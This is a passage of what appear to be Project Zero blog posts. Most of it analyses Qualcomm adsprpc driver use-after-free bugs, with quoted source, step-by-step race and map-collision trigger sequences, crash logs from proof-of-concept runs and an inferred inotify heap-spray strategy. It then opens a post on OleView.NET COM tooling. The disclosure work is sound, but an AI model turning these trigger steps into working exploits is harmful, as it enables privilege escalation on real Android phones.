    [ 2890.561978] [0:            poc:22189] Kernel panic - not syncing: Oops: Fatal exception

    PZ Issue 42451713 (fixed with CVE-2024-33060): Incorrect searching algorithm in fastrpc_mmap_find leads to kernel address space info leak

    The fastrpc_mmap_create function calls fastrpc_mmap_find with attacker-controlled arguments in order to identify existing maps that already fulfill the map creation request. If an existing map fulfills the request, it simply takes a refcount on that map and returns (this is an important aspect of CVE-2024-49848 too, as we’ll see in the next section!). In the case of global maps it performs the following:

    hlist_for_each_entry_safe(map, n, &me->maps, hn) { 

        if (va >= map->va &&  //Is the userland provided va and len in the range of the map?

        va + len <= map->va + map->len && 

        map->fd == fd) { //And is the fd the same?

            if (refs) { 

                if (map->refs + 1 == INT_MAX) { 

                     spin_unlock_irqrestore(&me->hlock, irq_flags); 

                     return -ETOOMANYREFS; 

                } 

               map->refs++; 

            } 

            match = map; 

            break; 

        } 

    }

    While this code makes sense for fl-local maps, where map->va is set to a userland-provided value, for global maps map->va is set to a kernel struct page pointer that serves as an opaque handle for the allocated memory. Consequently, via fastrpc_internal_mem_map, an attacker can cause a userland-provided value to be compared to a kernel struct page pointer. Furthermore, the ioctl return value can differ based on whether the comparison returns true or false, allowing an attacker to brute force the page pointer address associated with a fastrpc_mmap object.

    CVE-2024-49848: FASTRPC_ATTR_KEEP_MAP logic bug allows fastrpc_internal_munmap_fd to racily free in-use mappings leading to UAF

    One critically important aspect of the fastrpc_internal_mem_unmap and fastrpc_internal_munmap functions is their reliance on fastrpc_mmap_remove when trying to find a map to delete. This function contains a list of checks to attempt to ensure that it cannot free a map presently in use:

    //Entered with fl mapping mutexes held

    static int fastrpc_mmap_remove(struct fastrpc_file *fl, int fd, uintptr_t va,

                                   size_t len, struct fastrpc_mmap **ppmap)

    {

            struct fastrpc_mmap *match = NULL, *map;

            struct hlist_node *n;

            struct fastrpc_apps *me = &gfa;

            unsigned long irq_flags = 0;

    ...

            hlist_for_each_entry_safe(map, n, &fl->maps, hn) {

                    if ((fd < 0 || map->fd == fd) && map->raddr == va &&

                            map->raddr + map->len == va + len &&

                            map->refs == 1 && //verifies only 1 reference (from map creation)

                            /* Remove if only one reference map and no context map */

                            !map->ctx_refs && //And that no context holds a reference (important because context creation can create maps as well)

                            /* Skip unmap if it is fastrpc shell memory */

                            !map->is_filemap) {

                            match = map;

                            hlist_del_init(&map->hn);

                            break;

                    }

            }

            if (match) {

                    *ppmap = match;

                    return 0;

            }

            return -ETOOMANYREFS;

    }

    This function tries to ensure there can be no references to a map outside of the initial reference set upon creation of the map. This works as long as no reference to the map that is unaccounted for by the explicit refcounts (map->refs > 1 || map->ctx_refs > 0) can exist concurrently with this function. This is, in fact, precisely the invariant violated by CVE-2024-33060! In that case, we have a transient stack-based reference (from map creation) that doesn’t take an explicit reference (map->refs == 1) and that is concurrent with this function (since the transient reference was held beyond the global mutexing lock).

    This invariant check is clearly a bit fragile to begin with, but there are at least two other paths to potential map destruction that don’t utilize this fastrpc_mmap_remove path and the guarantees it tries to provide. One of these paths is fastrpc_internal_munmap_fd:

    /*

     *        fastrpc_internal_munmap_fd can only be used for buffers

     *        mapped with persist attributes. This can only be called

     *        once for any persist buffer

     */

    int fastrpc_internal_munmap_fd(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_munmap_fd *ud)

    {

            int err = 0;

            struct fastrpc_mmap *map = NULL;

            ...

            mutex_lock(&fl->internal_map_mutex);

            mutex_lock(&fl->map_mutex);

            err = fastrpc_mmap_find(fl, ud->fd, NULL, ud->va, ud->len, 0, 0, &map);

            if (err) {

                    ...

                    mutex_unlock(&fl->map_mutex);

                    goto bail;

            }

            if (map && (map->attr & FASTRPC_ATTR_KEEP_MAP)) {

                    map->attr = map->attr & (~FASTRPC_ATTR_KEEP_MAP);

                    fastrpc_mmap_free(map, 0);

            }

            mutex_unlock(&fl->map_mutex);

    bail:

            mutex_unlock(&fl->internal_map_mutex);

            return err;

    }

    We can see that this function finds a map and calls fastrpc_mmap_free on that map if the flag FASTRPC_ATTR_KEEP_MAP is set. It also unsets this flag, so it’s impossible to call this function on the same map more than once. Looking inside fastrpc_mmap_create, we see a corresponding line of code that adds an additional reference in the case where this flag is set:

    static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd, struct dma_buf *buf,

            unsigned int attr, uintptr_t va, size_t len, int mflags,

            struct fastrpc_mmap **ppmap)

    {

            ...

            map = kzalloc(sizeof(*map), GFP_KERNEL);

            ...

            INIT_HLIST_NODE(&map->hn);

            map->flags = mflags;

            map->refs = 1;

            map->fl = fl;

            map->fd = fd;

            map->attr = attr;

            ...

            map->ctx_refs = 0;

            ktime_get_real_ts64(&map->map_start_time);

            if (mflags == ADSP_MMAP_HEAP_ADDR ||

                                    mflags == ADSP_MMAP_REMOTE_HEAP_ADDR) {

                    ...

            } else if (mflags == FASTRPC_MAP_FD_NOMAP) {

                    ...

            } else {

                    if (map->attr && (map->attr & FASTRPC_ATTR_KEEP_MAP)) {

                            ADSPRPC_INFO("buffer mapped with persist attr 0x%x\n",

                                    (unsigned int)map->attr);

                        map->refs = 2; //Reference count increases to 2

                    }

                    ...

                    map->va = va;

            }

            map->len = len;

            ...

            fastrpc_mmap_add(map);

            *ppmap = map;

    bail:

            ...

            return err;

    }

    However, we can see that map->refs is only bumped in the default case, where mflags isn’t equal to one of ADSP_MMAP_HEAP_ADDR, ADSP_MMAP_REMOTE_HEAP_ADDR or FASTRPC_MAP_FD_NOMAP. We can also see that regardless of the mflags value, it is possible to set FASTRPC_ATTR_KEEP_MAP - so it is still possible to create a FASTRPC_ATTR_KEEP_MAP map with map->refs == 1! This means the map is visible to a fastrpc_internal_munmap_fd call, which does not enforce the invariant that fastrpc_mmap_remove provides before fastrpc_mmap_free gets called. This can be a problem, for example, when a context takes a reference to a FASTRPC_ATTR_KEEP_MAP, FASTRPC_MAP_FD_NOMAP mapping in get_args:

    static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)

    {

            remote_arg64_t *rpra, *lrpra;

            remote_arg_t *lpra = ctx->lpra;

            ...

            int mflags = 0;

            ...

            for (i = 0; i < bufs; ++i) {

                    uintptr_t buf = (uintptr_t)lpra[i].buf.pv;

                    size_t len = lpra[i].buf.len;

                    mutex_lock(&ctx->fl->map_mutex);

                    if (ctx->fds && (ctx->fds[i] != -1))

                            err = fastrpc_mmap_create(ctx->fl, ctx->fds[i], NULL,

                                            ctx->attrs[i], buf, len,

                                            mflags, &ctx->maps[i]);//Can take a reference to an existing mapping

                    if (ctx->maps[i])

                            ctx->maps[i]->ctx_refs++;

                    mutex_unlock(&ctx->fl->map_mutex);

    ...

            }

    map->ctx_refs is set to greater than zero, but this does not stop fastrpc_internal_munmap_fd’s call to fastrpc_mmap_free from calling kfree on the map:

    static void fastrpc_mmap_free(struct fastrpc_mmap *map, uint32_t flags)

    {

            ...

            if (map->flags == ADSP_MMAP_HEAP_ADDR ||

                                    map->flags == ADSP_MMAP_REMOTE_HEAP_ADDR) {

                    ...

            } else {

                    map->refs--;

                    if (!map->refs && !map->ctx_refs)

                            hlist_del_init(&map->hn);

                    if (map->refs > 0 && !flags) //This is the only relevant bailout to avoid freeing map - ctx_refs value does not influence free decision

                            return;

            }

            ...

    bail:

            if (!map->is_persistent)

                    kfree(map); //Map is destroyed here!

    }

    This means it’s theoretically possible to create a UAF mapping if a fastrpc context holds the only reference to a FASTRPC_MAP_FD_NOMAP mapping with the FASTRPC_ATTR_KEEP_MAP attribute set. This cocktail of flags and attributes is possible with fastrpc_internal_mem_map, however it’s not immediately apparent how to cause a context to hold the only reference. The only intended circumstance where a context holds the sole reference to a map is when context creation and initialization leads directly to map creation - but in that map creation path, it’s not possible to specify the flags and attributes necessary to create the needed edge case. We need to have fastrpc_internal_mem_map create the map, have a context take a reference, and then somehow drop the initial reference that map creation provides. We cannot do this with fastrpc_internal_mem_unmap (because of the guarantees provided by fastrpc_mmap_remove) but we CAN racily do this by taking the fastrpc_internal_mem_map bailout after the map is created and a context has taken a reference!

    int fastrpc_internal_mem_map(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_mem_map *ud)

    {

            int err = 0;

            struct fastrpc_mmap *map = NULL;

            mutex_lock(&fl->internal_map_mutex);

            ...

            mutex_lock(&fl->map_mutex);

            VERIFY(err, !(err = fastrpc_mmap_create(fl, ud->m.fd, NULL, ud->m.attrs,

                            ud->m.vaddrin, ud->m.length,

                             ud->m.flags, &map))); //Create the map here

            mutex_unlock(&fl->map_mutex);

            ... //Have a context take a reference to the created map here

            VERIFY(err, !(err = fastrpc_mem_map_to_dsp(fl, ud->m.fd, ud->m.offset,

                    ud->m.flags, map->va, map->phys, map->size, &map->raddr))); //Fail this

            if (err)

                    goto bail; //bailout

            ud->m.vaddrout = map->raddr;

    bail:

            if (err) {

                    ...

                    if (map) {

                            mutex_lock(&fl->map_mutex);

                            fastrpc_mmap_free(map, 0); //Drop reference leaving the context as the only reference holder

                            mutex_unlock(&fl->map_mutex);

                    }

            }

            mutex_unlock(&fl->internal_map_mutex);

            return err;

    }

    Consider two concurrent processes (A and B) implementing the following sequence of events:

    [A]: Completely fills the dsp address space with valid mappings using fastrpc_internal_mem_map

    [A]: Creates a FASTRPC_MAP_FD_NOMAP map with attribute FASTRPC_ATTR_KEEP_MAP using fastrpc_internal_mem_map and enters into fastrpc_mem_map_to_dsp (holding internal_map_mutex, dropped map_mutex)

    map->refs == 1, map->ctx_refs == 0

    [B]: Invokes a call using FASTRPC_IOCTL_INVOKE2 and creates a context, get_args grabs the map mutex, finds and grabs a reference to map, drops the map mutex (not holding any mutexes)

    map->refs == 2, map->ctx_refs == 1

    [A]: fastrpc_mem_map_to_dsp fails as the dsp address space is completely full, fastrpc_internal_mem_map bails out and calls fastrpc_mmap_free, dropping the internal_map_mutex (not holding any mutexes)

    map->refs == 1, map->ctx_refs == 1

    [A]: Calls fastrpc_internal_munmap_fd grabs internal_map_mutex, and map_mutex, finds map with fastrpc_mmap_find, and calls fastrpc_mmap_free because the FASTRPC_ATTR_KEEP_MAP attribute is set

    map->refs == 0, map->ctx_refs == 1, mapping is kfree'd

    At the end of this sequence, an existing context still holds a reference to the freed map. An example crash from this bug is:

    [42694.423088] [0:            poc: 7171] Unable to handle kernel paging request at virtual address 006b6b6b6b6b6c27

    [42694.423153] [0:            poc: 7171] PC Code: b4000115 7100111f 540000c0 7100211f 54000080 (b940beb4) 71001e9f 54001ba2 7100211f 54000060 7100111f 54000c21 d0000120 91040000 95658fb7 b9406a68 aa0003e1 71000508 b9006a68 54000181

    [42694.423167] [0:            poc: 7171] LR Code: 2a1f03e1 97ffeafe (91002294) eb1402bf

    [42694.423229] [0:            poc: 7171] Mem abort info:

    [42694.423236] [0:            poc: 7171]   ESR = 0x96000004

    [42694.423243] [0:            poc: 7171]   EC = 0x25: DABT (current EL), IL = 32 bits

    [42694.423259] [0:            poc: 7171]   SET = 0, FnV = 0

    [42694.423265] [0:            poc: 7171]   EA = 0, S1PTW = 0

    [42694.423270] [0:            poc: 7171]   FSC = 0x04: level 0 translation fault

    [42694.423277] [0:            poc: 7171] Data abort info:

    [42694.423281] [0:            poc: 7171]   ISV = 0, ISS = 0x00000004

    [42694.423288] [0:            poc: 7171]   CM = 0, WnR = 0

    [42694.423294] [0:            poc: 7171] [006b6b6b6b6b6c27] address between user and kernel address ranges

    [42694.423304] [0:            poc: 7171] Internal error: Oops: 96000004 [#1] PREEMPT SMP

    ...

    [42694.424942] [0:            poc: 7171] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT)

    [42694.424947] [0:            poc: 7171] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)

    [42694.424954] [0:            poc: 7171] pc : fastrpc_mmap_free+0x58/0x734 [frpc_adsprpc]

    [42694.425067] [0:            poc: 7171] lr : context_free+0x130/0x2cc [frpc_adsprpc]

    [42694.425173] [0:            poc: 7171] sp : ffffffc036c4b8d0

    [42694.425178] [0:            poc: 7171] x29: ffffffc036c4b920 x28: 0000000000000000 x27: ffffffc036c4bba8

    [42694.425190] [0:            poc: 7171] x26: 0000000000000003 x25: 00000049216800d0 x24: ffffffc003d62390

    [42694.425198] [0:            poc: 7171] x23: ffffffc003d4ff88 x22: 0000000000000002 x21: 6b6b6b6b6b6b6b6b

    [42694.425206] [0:            poc: 7171] x20: 00000000ffffffff x19: ffffff88ef024d00 x18: ffffffc01e79d028

    [42694.425215] [0:            poc: 7171] x17: ffffffffffffffff x16: 0000000000000004 x15: 0000000000000004

    [42694.425222] [0:            poc: 7171] x14: ffffff8957f20000 x13: 0000000000001c4a x12: 0000000000000003

    [42694.425231] [0:            poc: 7171] x11: 0000000100449c4a x10: ffffff8846550040 x9 : 0000000000000000

    [42694.425239] [0:            poc: 7171] x8 : 000000006b6b6b6b x7 : 2820637072707364 x6 : 61203a726f727245

    [42694.425247] [0:            poc: 7171] x5 : ffffff88002ada57 x4 : 6363346478302041 x3 : 0000000000000000

    [42694.425255] [0:            poc: 7171] x2 : ffffff8846550040 x1 : 0000000000000000 x0 : ffffff88ef024d00

    [42694.425263] [0:            poc: 7171] Call trace:

    [42694.425267] [0:            poc: 7171]  fastrpc_mmap_free+0x58/0x734 [frpc_adsprpc]

    [42694.425373] [0:            poc: 7171]  context_free+0x130/0x2cc [frpc_adsprpc]

    [42694.425479] [0:            poc: 7171]  fastrpc_internal_invoke+0xb88/0x1ef4 [frpc_adsprpc]

    [42694.425584] [0:            poc: 7171]  fastrpc_internal_invoke2+0x320/0x408 [frpc_adsprpc]

    [42694.425689] [0:            poc: 7171]  fastrpc_device_ioctl+0x1b0/0x92c [frpc_adsprpc]

    [42694.425795] [0:            poc: 7171]  __arm64_sys_ioctl+0x120/0x170

    [42694.425805] [0:            poc: 7171]  invoke_syscall+0x58/0x13c

    [42694.425811] [0:            poc: 7171]  el0_svc_common+0xb4/0xf0

    [42694.425817] [0:            poc: 7171]  do_el0_svc+0x24/0x90

    [42694.425823] [0:            poc: 7171]  el0_svc+0x20/0x7c

    [42694.425828] [0:            poc: 7171]  el0t_64_sync_handler+0x84/0xe4

    [42694.425833] [0:            poc: 7171]  el0t_64_sync+0x1b8/0x1bc

    [42694.425842] [0:            poc: 7171] Code: 7100111f 540000c0 7100211f 54000080 (b940beb4)

    [42694.425853] [0:            poc: 7171] ---[ end trace 7349f07610aa0ad6 ]---

    [42694.425862] [0:            poc: 7171] Kernel panic - not syncing: Oops: Fatal exception

    CVE-2024-43047 (ITW): Map collision leads to UAF on 4.x kernels, and some 5.x kernel configurations

    At this point, it became apparent that two of these issues bear more than a passing resemblance to the exploit logs. The kernel panics (particularly the first one) strongly suggest that a fastrpc_mmap struct is involved in the initial memory corruption primitive, and the exploit makes calls to several ioctls that are responsible for the creation and administration of these structs. Additionally, we previously saw memory corruption in the chain of structs/members map->fl->cid. The logs make a lot of sense in the context of a UAF of this fastrpc_mmap struct, meaning that CVE-2024-33060 and CVE-2024-49848 stand out as particularly plausible candidates to have been the ITW issue used by the attacker. However, if the exploit were triggering CVE-2024-33060, I would have expected it to generate some kernel log lines that we don’t see in the ITW artifacts. CVE-2024-49848 is disqualified on the basis that it only works on strictly newer kernels than those the ITW exploit was used against.

    Complicating the identification of the ITW bug, the exploit repeatedly hits several early bailouts in the ioctl handlers - these bailouts have no discernible side effect and it’s unclear why the exploit exercises this code at all. It is difficult to know what log lines from the exploit are due to this behavior and what log lines are related to the exploit exercising the bug used. But the kernel panics themselves do not lie. They are indisputable records of memory corruption, and (particularly in cases where the crash came from the exploit program itself) their associated stack traces are strong indicators of proximity to the bug or to the exploit strategy.

    A context treats references to a map differently depending on if the map is used as a buffer or as a handle. The context has a dynamically allocated array for map pointer references in ctx->maps, and both buffers and handles are referenced in this array.

    static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)

    {

            ...

            uint32_t sc = ctx->sc;

            int inbufs = REMOTE_SCALARS_INBUFS(sc);

            int outbufs = REMOTE_SCALARS_OUTBUFS(sc);

            int handles, bufs = inbufs + outbufs;

            ...

            for (i = 0; i < bufs; ++i) { //buffer references

                    ...

                    if (ctx->fds && (ctx->fds[i] != -1))

                            err = fastrpc_mmap_create(ctx->fl, ctx->fds[i], NULL,

                                            ctx->attrs[i], buf, len,

                                            mflags, &ctx->maps[i]);

                    if (ctx->maps[i])

                            ctx->maps[i]->ctx_refs++;

                    ...

            }

            ...

            handles = REMOTE_SCALARS_INHANDLES(sc) + REMOTE_SCALARS_OUTHANDLES(sc);

            ...

            for (i = bufs; i < bufs + handles; i++) { //handle references

                    ...

                    if (!dsp_cap_ptr->dsp_attributes[DMA_HANDLE_REVERSE_RPC_CAP] &&

                                            ctx->fds && (ctx->fds[i] != -1))

                            err = fastrpc_mmap_create(ctx->fl, ctx->fds[i], NULL,

                                            FASTRPC_ATTR_NOVA, 0, 0, dmaflags,

                                            &ctx->maps[i]);

                    if (!err && ctx->maps[i])

                            ctx->maps[i]->ctx_refs++;

                    if (err) {

                            for (j = bufs; j < i; j++) {

                                    if (ctx->maps[j] && ctx->maps[j]->ctx_refs)

                                            ctx->maps[j]->ctx_refs--;

                                    fastrpc_mmap_free(ctx->maps[j], 0);

                            }

                            ...

                    }

                    ...

            }

            mutex_unlock(&ctx->fl->map_mutex);

    However, only buffers are freed using the pointer reference in ctx->maps. In fact, once handle maps are initialized without error, their reference in ctx->maps is never used again. Instead, the DSP is given a list of values associated with map file descriptors, and later passes these file descriptors back to the adsprpc driver in the AP once it is done using them. The AP then finds a map associated with the file descriptor returned by the DSP and drops a reference on it, potentially freeing it:

    static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,

                        remote_arg_t *upra)

    {

            ...

            for (i = 0; i < M_FDLIST; i++) {

                    if (!fdlist[i])

                            break;

                    if (!fastrpc_mmap_find(ctx->fl, (int)fdlist[i], NULL, 0, 0,

                                    0, 0, &mmap)) {

                            if (mmap && mmap->ctx_refs)

                                    mmap->ctx_refs--;

                            fastrpc_mmap_free(mmap, 0);

                    }

            ...

            }

    This is wrong because there is no guarantee that the map found and de-refcounted in put_args is the same map that get_args previously took a reference on; in fact, it could be a map still referenced by another context as a buffer. I discovered that this can happen if there are map collisions (cases where two created maps would fulfill a fastrpc_mmap_find request). Since fastrpc_mmap_find will find any mapping that encompasses the searched virtual-address range, you can create a mapping B that collides with future searches for mapping A by making it a superset of mapping A's virtual address range, e.g. by setting mapB->va == mapA->va && mapB->len > mapA->len.

    An example of this map collision that leads to memory corruption is:

    1. Create a small mapping A with va == 0 using fastrpc_internal_mmap
    2. Create context 1, get_args gets a reference to mapping A as a handle.
    3. Create a BIG second mapping B with va == 0 using fastrpc_internal_mmap with the same fd as mapping A.
    4. Create context 2, grab a reference to mapping B as a buffer (vs a handle) so that we use the ctx->maps pointer.
    5. Complete context 1, causing put_args to be called. We find and drop a refcount on mapping B since it collides with mapping A. Mapping A’s refcount is permanently leaked.
    6. We then unmap mapping B using FASTRPC_IOCTL_MUNMAP

    Now there is a still-valid context (context 2 in the above example) that holds a reference to mapping B even though mapping B was freed. Here’s an example kernel panic when triggering this bug:

    [93168.108618]  [3:            poc: 8227] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000018

    [93168.108656]  [3:            poc: 8227] Mem abort info:

    [93168.108675]  [3:            poc: 8227]   ESR = 0x96000006

    [93168.108696]  [3:            poc: 8227]   Exception class = DABT (current EL), IL = 32 bits

    [93168.108716]  [3:            poc: 8227]   SET = 0, FnV = 0

    [93168.108735]  [3:            poc: 8227]   EA = 0, S1PTW = 0

    [93168.108754]  [3:            poc: 8227] Data abort info:

    [93168.108773]  [3:            poc: 8227]   ISV = 0, ISS = 0x00000006

    [93168.108792]  [3:            poc: 8227]   CM = 0, WnR = 0

    [93168.108816]  [3:            poc: 8227] user pgtable: 4k pages, 39-bit VAs, pgdp = 00000000a5933260

    [93168.108837]  [3:            poc: 8227] [0000000000000018] pgd=08000001926ef003, pud=08000001926ef003, pmd=0000000000000000

    [93168.108905]  [3:            poc: 8227] Internal error: Oops: 96000006 [#1] PREEMPT SMP

    [93168.108928]  [3:            poc: 8227] Modules linked in:

    [93168.108951]  [3:            poc: 8227] Process poc (pid: 8227, stack limit = 0x0000000041a3591e)

    [93168.108979]  [3:            poc: 8227] CPU: 3 PID: 8227 Comm: poc FTT: 0 0 Tainted: G S      W         4.19.113-27095354 #1

    [93168.109000]  [3:            poc: 8227] Hardware name: Samsung X1Q PROJECT - SM-G981V_REV0.3_PV3 (board-id,20) (DT)

    [93168.109024]  [3:            poc: 8227] pstate: 80400005 (Nzcv daif +PAN -UAO)

    [93168.109047]  [3:            poc: 8227] pc : dma_buf_unmap_attachment+0x20/0x58

    [93168.109069]  [3:            poc: 8227] lr : fastrpc_mmap_free+0x3dc/0x4e8

    [93168.109088]  [3:            poc: 8227] sp : ffffff80302239c0

    [93168.109107]  [3:            poc: 8227] x29: ffffff80302239c0 x28: 0000000000000002 

    [93168.109131]  [3:            poc: 8227] x27: 0000000000010100 x26: ffffff8030223bf0 

    [93168.109154]  [3:            poc: 8227] x25: ffffffc0c518f410 x24: ffffffc09152ce00 

    [93168.109177]  [3:            poc: 8227] x23: ffffff800b48d0b0 x22: 0000000000010000 

    [93168.109199]  [3:            poc: 8227] x21: 00000004f79e0000 x20: 0000000000000003 

    [93168.109222]  [3:            poc: 8227] x19: ffffffc0145d2e00 x18: 0000000000000000 

    [93168.109244]  [3:            poc: 8227] x17: 0000000000000000 x16: a70d810816bbf5af 

    [93168.109267]  [3:            poc: 8227] x15: 0000000000000008 x14: 0000000080000000 

    [93168.109289]  [3:            poc: 8227] x13: 0000000034155555 x12: 001d067cf6237800 

    [93168.109312]  [3:            poc: 8227] x11: 0000000000000007 x10: 0000000000000003 

    [93168.109334]  [3:            poc: 8227] x9 : 0000000000000000 x8 : 0000000000000000 

    [93168.109357]  [3:            poc: 8227] x7 : 0001010000000004 x6 : ffffff8030223c08 

    [93168.109379]  [3:            poc: 8227] x5 : ffffff8030223c08 x4 : 0000000000000004 

    [93168.109401]  [3:            poc: 8227] x3 : 0000000037c648b0 x2 : 0000000000000000 

    [93168.109423]  [3:            poc: 8227] x1 : ffffffc111df9800 x0 : ffffffc111df9680 

    [93168.114754]  [3:            poc: 8227] Call trace:

    [93168.114777]  [3:            poc: 8227]  dma_buf_unmap_attachment+0x20/0x58

    [93168.114799]  [3:            poc: 8227]  fastrpc_mmap_free+0x3dc/0x4e8

    [93168.114821]  [3:            poc: 8227]  fastrpc_internal_invoke+0x1654/0x24b0

    [93168.114843]  [3:            poc: 8227]  fastrpc_device_ioctl+0xcd4/0x1df8

    [93168.114865]  [3:            poc: 8227]  do_vfs_ioctl+0x6f0/0xac0

    [93168.114887]  [3:            poc: 8227]  __arm64_sys_ioctl+0x74/0xa8

    [93168.114909]  [3:            poc: 8227]  el0_svc_common+0xd8/0x188

    [93168.114931]  [3:            poc: 8227]  el0_svc_handler+0x6c/0x90

    [93168.114952]  [3:            poc: 8227]  el0_svc+0x8/0x280

    [93168.114977]  [3:            poc: 8227] Code: b4000121 f9400008 b40000e8 f9401108 (f9400d08) 

    [93168.115002]  [3:            poc: 8227] ---[ end trace 2a2f45652740934f ]---

    [93168.197067]  [3:            poc: 8227] Kernel panic - not syncing: Fatal exception

    Another researcher, Conghui Wang, appears to have discovered a different path to reach the same bug that does not involve map collisions - since the code running on the DSP can be from an unsigned ELF binary uploaded by the attacker, it’s possible for an attacker to simply have the DSP send back bogus fds in an RPC response, causing the AP kernel to free mappings that are still referenced.

    This bug retains a similarly high level of resemblance to the original in-the-wild exploit as CVE-2024-33060 and CVE-2024-49848 did. It appears to be a UAF on the same object that was likely exploited given the ITW kernel logs (struct fastrpc_mmap), and unlike the other discovered bugs cannot be disqualified on the basis of non-intersecting version ranges or log messages. While we cannot prove beyond a doubt that this is the same bug used by the ITW attacker, after careful consideration TAG and Project Zero determined that this issue met the bar for being considered as exploited ITW. We are confident that this driver is under active exploitation by real-world attackers and that all the bugs resolved as part of this research had an outsized impact in preventing in-the-wild exploitation.

    Excavating an exploit

    After discovering these issues, I looked into potential ways to exploit a fastrpc_mmap struct vulnerability. Finding a compatible object to heap spray that would yield a meaningfully improved primitive (especially without an ASLR leak) is not a trivial task for this bug. While looking across the Linux kernel for useful objects to spray, my attention was once again drawn back to the ITW exploit logs, in particular the logs we saw previously involving an invalid channel id:

    [   40.917577] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    This value is coming from map->fl->cid - so it seems exceedingly likely that whatever heap spray object the attacker used had a timestamp value at this offset location. Perhaps it would be possible to discover what object the attacker was heap spraying! After searching fruitlessly for cases of time-related members of variable-sized structs, my attention was drawn to kernel panic log 3:

    [ 2247.159424] Unable to handle kernel paging request at virtual address 006f7778a9cf5b88

    ...

    [ 2247.159719] Call trace:

    [ 2247.159727]  __kmalloc+0x1c4/0x398

    [ 2247.159740]  inotify_handle_event+0xc8/0x1c8

    [ 2247.159746]  fsnotify+0x270/0x378

    We see here a crash that occurred in a heap allocation, crucially before the invalid channel id messages typically appeared in the log. Looking at inotify_handle_event more closely, we see the following variable-sized allocation:

    int inotify_handle_event(struct fsnotify_group *group,

                             struct inode *inode,

                             u32 mask, const void *data, int data_type,

                             const unsigned char *file_name, u32 cookie,

                             struct fsnotify_iter_info *iter_info)

    {

            ...

            struct inotify_event_info *event;

            ...

            int alloc_len = sizeof(struct inotify_event_info);

            ...

            if (file_name) {

                    len = strlen(file_name);

                    alloc_len += len + 1;

            }

            ...

            event = kmalloc(alloc_len, GFP_KERNEL_ACCOUNT | __GFP_RETRY_MAYFAIL);

    I then compared the struct offsets for map->fl->cid and superimposed them onto a struct inotify_event_info object. We see that map->fl->cid aligns perfectly with event->fse.inode->i_mtime - the modification time for the file inode associated with the inotify event! Given that the cid is set to a timestamp value by the exploit, this makes perfect sense. It’s highly likely that part of the ITW exploit process involved spraying inotify_event_info objects in order to reclaim a UAF’d fastrpc_mmap struct (perhaps as part of an ASLR leak), and that the unrealistic channel id value is the modification time for whatever file the exploit used for the heap spray. Based on the pipe crash, it seems plausible it then reallocates the fastrpc_mmap struct with pipe buffers to gain full control of the underlying object. This, plus an info leak, would be more than enough to achieve code execution or arbitrary read/write.

    Conclusion

    It took less than 3 months of research to discover 6 separate bugs in the adsprpc driver, two of which (CVE-2024-49848 and CVE-2024-21455) were not fixed by Qualcomm under the industry standard 90-day deadline. Furthermore, at the time of writing, CVE-2024-49848 remains unfixed 145 days after it was reported. Past research has shown that chipset drivers for Android are a promising target for attackers, and this ITW exploit represents a meaningful real-world example of the negative ramifications that the current third-party vendor driver security posture poses to end-users. A system’s cybersecurity is only as strong as its weakest link, and chipset/GPU drivers represent one of the weakest links for privilege separation on Android in 2024. Improving both the consistency and quality of code and the efficiency of the third-party vendor driver patch dissemination process are crucial next steps in order to increase the difficulty of privilege escalation on Android devices.


    Windows Tooling Updates: OleView.NET

    December 12, 2024, 20:27

    Posted by James Forshaw, Google Project Zero

    This is a short blog post about some recent improvements I've been making to the
    OleView.NET tool which has been released as part of version 1.16. The tool is designed to discover the attack surface of Windows COM and find security vulnerabilities such as privilege escalation and remote code execution. The updates were recently presented at the Microsoft Bluehat conference in Redmond under the name "DCOM Research for Everyone!". This blog expands on the topics discussed to give a bit more background and detail that couldn't be fit within the 45-minute timeslot. This post assumes a knowledge of COM as I'm only going to describe a limited number of terms.

    Using the OleView.NET Tooling

    Before we start the discussion it's important to understand how you can get hold of the OleView.NET tool and some basic usage. The simplest way to get the tooling is to install it from the PowerShell gallery with the Install-Module OleViewDotNet command. This installs both the PowerShell module and the GUI.

    Next you need to parse the COM registration artifacts into an internal database. You can do this by running the Get-ComDatabase command. Once it's finished you're ready to go. You will notice that it can take a long time to complete, so it'd be annoying to have to do this every time you want to start researching. For that reason you can use the command Set-ComDatabase -Default to write out the database to a default storage location. Now the next time you start PowerShell you can just run an inspection command, such as Get-ComClass and the default database will be automatically loaded.

    This default database is also shared with the GUI, which you can start by running the Show-ComDatabase command. For general research I find the GUI to be easier to use and you can click around and look at the COM registration information. For analysis, the ability to script through PowerShell is more important.

    Researching COM Services

    Performing security research in COM usually involves the following steps:

    • Enumerate potential COM classes of interest. These might be classes which are accessible outside of a sandbox, running at high privilege or designed to be remotely exposed.
    • Validate whether the COM classes are truly accessible from the attack position. COM has various security controls which determine what users can launch, activate and access an object. Understanding these security controls allows the list of COM classes of interest to be limited to only those that are actually part of the attack surface.
    • Enumerate exposed interfaces, determine what they do and call methods on them to test for security vulnerabilities.

    The last step is the focus of the updates to the tooling, making it easier to determine what an exposed interface does and call methods to test the behavior. The goal is to minimize the amount of reverse engineering needed (although generally some is still required) as well as avoid needing to write code outside of the tooling to interact with the COM service under test.

    To achieve this goal, OleView.NET will pull together any sources of interface information it has, then provide a mechanism to inspect and invoke methods on the interface through the UI or via PowerShell. The sources of information that it currently pulls together are:

    1. Known interfaces, either defined in the base .NET framework class libraries or inside OleView.NET.
    2. COM interface definitions present in the Global Assembly Cache.
    3. Registered type libraries.
    4. Windows Runtime interfaces.
    5. Extracted proxy class marshaling information.

    One useful benefit of gathering this information is that the tool formats the interface as "source code" so you can manually inspect it.

    Formatting Interfaces Definitions

    The OleView.NET tool uses a database object to represent all the artifacts it has analyzed on your system. The latest released version defines some of these objects to be convertible to "source code". For example, the following can be converted if the tool can determine some metadata to represent the artifact:

    • COM interfaces
    • COM proxies
    • COM Windows Runtime classes.
    • Type libraries, interfaces and classes.

    How you get to this conversion depends on whether you're using the PowerShell or the UI. The simplest approach is PowerShell, using the ConvertTo-ComSourceCode command. For example, the following will convert an interface object into source code:

    PS> Get-ComInterface -Name IMyInterface | ConvertTo-ComSourceCode -Parse

